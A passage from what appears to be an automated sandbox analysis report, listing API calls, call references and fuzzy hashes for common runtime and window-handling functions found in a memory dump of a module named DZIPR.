GetFileTime.KERNEL32(?,?,?,?), ref: 6FEA7DBF
GetFileSizeEx.KERNEL32(?,?), ref: 6FEA7DD7

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: File$SizeTime_memset
String ID:
API String ID: 151880914-0
Opcode ID: a3156f1733fffb1aa1051a95cd520e226a8cd07261bd08d941878fe27a0dc701
Instruction ID: 94b4dd09c3d8180314740e4c046b921be34713f18ec54c744d7090193bbfc4bf
Opcode Fuzzy Hash: a3156f1733fffb1aa1051a95cd520e226a8cd07261bd08d941878fe27a0dc701
Instruction Fuzzy Hash: 0E510B715047059FDB20CF68C94499ABBF8FF09324B208A2EE5A6D7690E735F945CB60

Function 6FEC081B Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6FEC084F
__isleadbyte_l.LIBCMT ref: 6FEC0883
MultiByteToWideChar.KERNEL32(00000080,00000009,6FEB40D8,6FECBF84,00000000,00000000,?,?,?,?,6FEB40D8,00000000,?), ref: 6FEC08B4
MultiByteToWideChar.KERNEL32(00000080,00000009,6FEB40D8,00000001,00000000,00000000,?,?,?,?,6FEB40D8,00000000,?), ref: 6FEC0922

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: b8a543402801726d24cb995d8bbf2137e8bfea4352ea9c3bc723b1dd3f83704d
Instruction ID: 99cb21e37ab667cf3d15fc71f63e9cca6161587dd742484bc4544a96bdca84e6
Opcode Fuzzy Hash: b8a543402801726d24cb995d8bbf2137e8bfea4352ea9c3bc723b1dd3f83704d
Instruction Fuzzy Hash: E131A672904245EFDB00CFA4CA94AAE7FB5EF01324F21956AF674DB291D330E941DB92

Function 6FEA88C8 Relevance: 6.1, APIs: 4, Instructions: 66memorystringCOMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32(?), ref: 6FEA88E7
lstrcmpW.KERNEL32(00000000,?), ref: 6FEA88F4
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 6FEA892E
GlobalLock.KERNEL32(00000000), ref: 6FEA8938

Part of subcall function 6FEADAD1: GlobalFlags.KERNEL32(?), ref: 6FEADAE0
Part of subcall function 6FEADAD1: GlobalUnlock.KERNEL32(?), ref: 6FEADAF2
Part of subcall function 6FEADAD1: GlobalFree.KERNEL32(?), ref: 6FEADAFD

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: Global$Lock$AllocFlagsFreeUnlocklstrcmp
String ID:
API String ID: 2391069079-0
Opcode ID: 02e67ceb4d7c4911d041ac5592eb8b8b12b751ed214cbcb173c4aaca1019646e
Instruction ID: b98bc989cdd3cb5f445b3aedf4e9ba0c0d9e6dda6185f70f770e8bbd2aa6d854
Opcode Fuzzy Hash: 02e67ceb4d7c4911d041ac5592eb8b8b12b751ed214cbcb173c4aaca1019646e
Instruction Fuzzy Hash: 21118F71504A44BFCB125BA5CD48DAF7EBDFF85705720046AFA15DA160D732EA10D721

Function 6FEABF5D Relevance: 6.1, APIs: 4, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(?), ref: 6FEABFBC
RtlLeaveCriticalSection.NTDLL(?), ref: 6FEABFCC
LocalFree.KERNEL32(?), ref: 6FEABFD5
TlsSetValue.KERNEL32(?,00000000), ref: 6FEABFE7

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: CriticalSection$EnterFreeLeaveLocalValue
String ID:
API String ID: 2949335588-0
Opcode ID: 5e4be5cbff95b6351345d3ea993585e82cdb9ea21409ae33efe85470fc75273d
Instruction ID: eb822f9751732d8720e5b11870c0786dd2ea8bca7cd62388f86acada60a26aff
Opcode Fuzzy Hash: 5e4be5cbff95b6351345d3ea993585e82cdb9ea21409ae33efe85470fc75273d
Instruction Fuzzy Hash: E5116A35A00608EFD714CF64C884F99BBA5FF46315F24846EF5628B6A1CB72B950CF10

Function 6FEA8EC9 Relevance: 6.1, APIs: 4, Instructions: 57threadCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6FEA8ED0

Part of subcall function 6FEA9C7C: __EH_prolog3.LIBCMT ref: 6FEA9C83

__wcsdup.LIBCMT ref: 6FEA8EF2
GetCurrentThread.KERNEL32 ref: 6FEA8F1F
GetCurrentThreadId.KERNEL32 ref: 6FEA8F28

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: CurrentH_prolog3Thread$__wcsdup
String ID:
API String ID: 190065205-0
Opcode ID: cc4c9a8ecd7c9a39de057aee63d04f02c068f57b25cca4f4aae9d8eb18de5828
Instruction ID: e158fcbe8ee396ef9163a825de10091862e0b670d6f30416912cf4b5cbb43be0
Opcode Fuzzy Hash: cc4c9a8ecd7c9a39de057aee63d04f02c068f57b25cca4f4aae9d8eb18de5828
Instruction Fuzzy Hash: BA217BB0904B448EC7219F7A864164AFEE4BFA4704B20891FD1AA8BB65DBB1A140CF45

Function 6FEB1D07 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 6FEB1D33
SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 6FEB1D5E
GetCapture.USER32 ref: 6FEB1D70
SendMessageW.USER32(00000000,0000001F,00000000,00000000), ref: 6FEB1D7F

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: MessageSend$Capture
String ID:
API String ID: 1665607226-0
Opcode ID: 35245ded69cd55f8ad29aca6a200fc5a6a9dceff6068bc286bccf85824332b1c
Instruction ID: 457aee7aa6870c0ad9ad4205468b11b4342a8fe76ddcf2e4364962baa9825549
Opcode Fuzzy Hash: 35245ded69cd55f8ad29aca6a200fc5a6a9dceff6068bc286bccf85824332b1c
Instruction Fuzzy Hash: D00152313402947BDE215BA68DCCFDB3E79DBCAB21F21007CB6049A1E6CAA19800D620

Function 6FEA6A83 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6FEA6A8A

Part of subcall function 6FEA68E2: _malloc.LIBCMT ref: 6FEA6900

__CxxThrowException@8.LIBCMT ref: 6FEA6AC0
FormatMessageW.KERNEL32(00001100,00000000,?,00000800,6FEA16A6,00000000,00000000,?,?,6FECD898,00000004,6FEA16A6,00000000,6FEA69F9,00000000), ref: 6FEA6AEA
LocalFree.KERNEL32(6FEA16A6,6FEA16A6,00000000,6FEA69F9,00000000), ref: 6FEA6B12

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc
String ID:
API String ID: 1776251131-0
Opcode ID: d9a1fb157581bd1454e1c87e87758f56e574873b5b81f6880f1ad44adae5154a
Instruction ID: 25905ce5fbb5455aad0908f364f9bdfcb319c60dfaa2e25565f03d9401240005
Opcode Fuzzy Hash: d9a1fb157581bd1454e1c87e87758f56e574873b5b81f6880f1ad44adae5154a
Instruction Fuzzy Hash: C1111C75604349AFDF049F68CD44AAA3FA5EF8A314F30C529F5298E2E0E7329A509B50

Function 6FEAD159 Relevance: 6.1, APIs: 4, Instructions: 56registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 6FEAD194
RegCloseKey.ADVAPI32(00000000), ref: 6FEAD19D
swprintf.LIBCMT ref: 6FEAD1BA
WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 6FEAD1CB

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: ClosePrivateProfileStringValueWriteswprintf
String ID:
API String ID: 22681860-0
Opcode ID: 897d1a7c87fd42209165552f2213dfdcecaf23ac2c47b64514342e45175f6433
Instruction ID: 7a3ec913a17882fbab53544fa7ddb072df9e2e784bd7688b86632c5889a3815d
Opcode Fuzzy Hash: 897d1a7c87fd42209165552f2213dfdcecaf23ac2c47b64514342e45175f6433
Instruction Fuzzy Hash: B401A176500309AFDB119B648D45FAF7BADAF4A718F21042AF910A7180DB75ED1587A0

Function 6FEA7287 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 6FEA68E2: _malloc.LIBCMT ref: 6FEA6900

GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 6FEA72BB
GetCurrentProcess.KERNEL32(?,00000000), ref: 6FEA72C1
DuplicateHandle.KERNEL32(00000000), ref: 6FEA72C4
GetLastError.KERNEL32(?), ref: 6FEA72DF

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
String ID:
API String ID: 3704204646-0
Opcode ID: 0a509d37403e1b37d95d4fca680826ae95a0e104b298d73167faf8081e872fdc
Instruction ID: 18f7dc3b534e1eade1d24f541ae9554fd21b32d7a92c1b789d0a84c150ca8ad3
Opcode Fuzzy Hash: 0a509d37403e1b37d95d4fca680826ae95a0e104b298d73167faf8081e872fdc
Instruction Fuzzy Hash: 50015E71600605ABDB009BAACD89F5A7EA9EFC5764F244465F515CF288DB72EC008760

Function 6FEB0F8D Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

GetTopWindow.USER32(?), ref: 6FEB0F9D
GetTopWindow.USER32(00000000), ref: 6FEB0FDC
GetWindow.USER32(00000000,00000002), ref: 6FEB0FFA

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: Window
String ID:
API String ID: 2353593579-0
Opcode ID: dbe6cf6573534a772fd2a6544410fd00824ce4ce90786be88f2fa047153d27b7
Instruction ID: 44f2f61429ff17e09b401948ad5a650f76ea6a922808749da18200db2aef0bfd
Opcode Fuzzy Hash: dbe6cf6573534a772fd2a6544410fd00824ce4ce90786be88f2fa047153d27b7
Instruction Fuzzy Hash: 5701803210961ABBCF025F948F08EDF3F26AF49366F105129FB2060160C736E532EBA1

Function 6FEBEC63 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 6FEBEC89

Part of subcall function 6FEBEAAE: __fltout2.LIBCMT ref: 6FEBEADA

__cftog_l.LIBCMT ref: 6FEBECAF
__cftoe_l.LIBCMT ref: 6FEBECE1

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: 88fba0569a9a7501f8aa6e550f16fea11be2cc6480daca6b645a6f18e03370ff
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: BB118372400A8EBBCF125F94DE45CDD3F62BB08358B248499FA2858170C732D6B1AF82

Function 6FEB03CF Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 6FEB03DC
GetTopWindow.USER32(00000000), ref: 6FEB03EF

Part of subcall function 6FEB03CF: GetWindow.USER32(00000000,00000002), ref: 6FEB0436

GetTopWindow.USER32(?), ref: 6FEB041F

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: Window$Item
String ID:
API String ID: 369458955-0
Opcode ID: d7f00d556e7ad391f5f350a842663398958efae64b7cdc57cb86a842710ccf10
Instruction ID: 50b55b5917b2bf16cf74e4f1bb83d9cdc38a8b41d37b8d61c969f72da777e61c
Opcode Fuzzy Hash: d7f00d556e7ad391f5f350a842663398958efae64b7cdc57cb86a842710ccf10
Instruction Fuzzy Hash: 0201D831005616678B121F218F04E8F3F26EF413A5B21A13DFF1455210DB31F5128791

Function 6FEAC220 Relevance: 6.0, APIs: 4, Instructions: 38COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(6FED34A8), ref: 6FEAC25A
RtlInitializeCriticalSection.NTDLL(?), ref: 6FEAC26C
RtlLeaveCriticalSection.NTDLL(6FED34A8), ref: 6FEAC279
RtlEnterCriticalSection.NTDLL(?), ref: 6FEAC289

Part of subcall function 6FEA6DC1: __CxxThrowException@8.LIBCMT ref: 6FEA6DD7
Part of subcall function 6FEA6DC1: __EH_prolog3.LIBCMT ref: 6FEA6DE4

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
String ID:
API String ID: 2895727460-0
Opcode ID: 0c7d83b7f6ab7ef0073d08effec790d04f6ae9b3fa0913432f59f0e1dd96e834
Instruction ID: 460a1ac6e8e2cf6bcf7057c7203bd02e50dd87c5cc23cc3b16279e5d6591f3a0
Opcode Fuzzy Hash: 0c7d83b7f6ab7ef0073d08effec790d04f6ae9b3fa0913432f59f0e1dd96e834
Instruction Fuzzy Hash: F4F06872604514AFDB005B9C9D467057F69EBD3769F310026F1548A641CB35D591C571

Function 6FEABA5B Relevance: 6.0, APIs: 4, Instructions: 35COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(6FED32EC), ref: 6FEABA69
TlsGetValue.KERNEL32(6FED32D0,?,?,?,?,6FEAC0B7,?,00000004,6FEAAF00,6FEA6DDD,6FEA68AD,?,6FEB4902,?), ref: 6FEABA7D
RtlLeaveCriticalSection.NTDLL(6FED32EC), ref: 6FEABA93
RtlLeaveCriticalSection.NTDLL(6FED32EC), ref: 6FEABA9E

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: CriticalSection$Leave$EnterValue
String ID:
API String ID: 3969253408-0
Opcode ID: 1cb8a4ef7ff9b2a504c899bcc2c6c904df5ec4309f7fb661a538891207a6f76b
Instruction ID: 296d7d7999d00155a3489ef99770ab3f8e55cc02d15428f580157a16603feb2c
Opcode Fuzzy Hash: 1cb8a4ef7ff9b2a504c899bcc2c6c904df5ec4309f7fb661a538891207a6f76b
Instruction Fuzzy Hash: 73F0B4362046089FD7208F18C888C0A7FEDEF86770325446AF65987200E632F861CBA0

Function 6FEC057A Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6FEC0586

Part of subcall function 6FEBA27F: __getptd_noexit.LIBCMT ref: 6FEBA282
Part of subcall function 6FEBA27F: __amsg_exit.LIBCMT ref: 6FEBA28F

__getptd.LIBCMT ref: 6FEC059D
__amsg_exit.LIBCMT ref: 6FEC05AB
__lock.LIBCMT ref: 6FEC05BB

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: f9283b80a586401edd1516f74cfdd4fbd837bdf06aef0e7154c435eb8070b201
Instruction ID: a510313e3e498dc3af6186ca2d13bc9b45995185c50fc0001201cebd998633c5
Opcode Fuzzy Hash: f9283b80a586401edd1516f74cfdd4fbd837bdf06aef0e7154c435eb8070b201
Instruction Fuzzy Hash: 2AF062B29407108FDB209B68870175C3EA05F01728F70151DEA60A72E0CB34A901CB52

Function 6FEAA698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

Part of subcall function 6FEAA59C: GetModuleHandleW.KERNEL32(KERNEL32,6FEAA6B6), ref: 6FEAA5AA
Part of subcall function 6FEAA59C: GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6FEAA5CB
Part of subcall function 6FEAA59C: GetProcAddress.KERNEL32(ReleaseActCtx), ref: 6FEAA5DD
Part of subcall function 6FEAA59C: GetProcAddress.KERNEL32(ActivateActCtx), ref: 6FEAA5EF
Part of subcall function 6FEAA59C: GetProcAddress.KERNEL32(DeactivateActCtx), ref: 6FEAA601

GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 6FEAA6D0
SetLastError.KERNEL32(0000006F), ref: 6FEAA6E7

Strings

, xrefs: 6FEAA705

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: AddressProc$Module$ErrorFileHandleLastName
String ID:
API String ID: 2524245154-3916222277
Opcode ID: ae966f0bb6752cd3d2a077e98667edbfd24e39823bb81bdbcc8902dddb832a90
Instruction ID: 5635ba2154c572a5ba431e64510cd17ebca2ae9729ed61fdf3ae3873b8085086
Opcode Fuzzy Hash: ae966f0bb6752cd3d2a077e98667edbfd24e39823bb81bdbcc8902dddb832a90
Instruction Fuzzy Hash: CB216A70841318DEDB20DF70C8487DABBB8BF49728F20869ED069DA280DB756A85CF50

Function 6FEA8E50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 6FEA8E78
PathFindExtensionW.SHLWAPI(?), ref: 6FEA8E8E

Part of subcall function 6FEA8BDF: __EH_prolog3_GS.LIBCMT ref: 6FEA8BE9
Part of subcall function 6FEA8BDF: GetModuleHandleW.KERNEL32(kernel32.dll,00000260,6FEA8EB7,?,?), ref: 6FEA8C19
Part of subcall function 6FEA8BDF: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 6FEA8C2D
Part of subcall function 6FEA8BDF: ConvertDefaultLocale.KERNEL32(?), ref: 6FEA8C69
Part of subcall function 6FEA8BDF: ConvertDefaultLocale.KERNEL32(?), ref: 6FEA8C77
Part of subcall function 6FEA8BDF: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 6FEA8C94
Part of subcall function 6FEA8BDF: ConvertDefaultLocale.KERNEL32(?), ref: 6FEA8CBF
Part of subcall function 6FEA8BDF: ConvertDefaultLocale.KERNEL32(000003FF), ref: 6FEA8CC8
Part of subcall function 6FEA8BDF: GetModuleFileNameW.KERNEL32(6FEA0000,?,00000105), ref: 6FEA8D7F

Strings

%s%s.dll, xrefs: 6FEA8E99

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3_HandlePath
String ID: %s%s.dll
API String ID: 1311856149-1649984862
Opcode ID: 22cc29e7f1f69461bacbaf26c40fe9fdc82ccb6438f2981ef394da0947f4a0ca
Instruction ID: 03f8926c9c3474b81a0c97daa52d9f347f0c65062125f0c66afc5a274e219727
Opcode Fuzzy Hash: 22cc29e7f1f69461bacbaf26c40fe9fdc82ccb6438f2981ef394da0947f4a0ca
Instruction Fuzzy Hash: A201A771905518EBCB05CBA8DD899EFBBF9AF4A314F1104AAA505DB140D6719B04CB50

Function 6FEBC53C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6FEB5017: __getptd.LIBCMT ref: 6FEB501D
Part of subcall function 6FEB5017: __getptd.LIBCMT ref: 6FEB502D

__getptd.LIBCMT ref: 6FEBC54B

Part of subcall function 6FEBA27F: __getptd_noexit.LIBCMT ref: 6FEBA282
Part of subcall function 6FEBA27F: __amsg_exit.LIBCMT ref: 6FEBA28F

__getptd.LIBCMT ref: 6FEBC559

Strings

csm, xrefs: 6FEBC567

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

